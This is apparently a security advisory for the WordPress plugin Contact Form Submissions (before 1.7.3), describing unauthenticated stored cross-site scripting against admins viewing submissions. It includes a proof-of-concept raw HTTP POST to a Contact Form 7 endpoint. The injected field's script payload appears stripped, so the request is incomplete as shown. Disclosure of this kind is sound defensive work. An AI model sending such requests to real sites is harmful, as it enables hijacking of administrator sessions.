Contact Form Submissions < 1.7.3 - Unauthenticated Stored XSS

The plugin does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission

PoC

POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470 X-Requested-With: XMLHttpRequest Content-Length: 726 Connection: close -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name=“your-name” Attacker -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name=“your-email” [email protected] -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name=“your-subject” XSS Injection -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name=“your-message” Sorry, not sorry. -----------------------------243715402120191890871051639470 Content-Disposition: form-data; name=“” Injected -----------------------------243715402120191890871051639470-- The XSS will be triggered when an admin view the related submission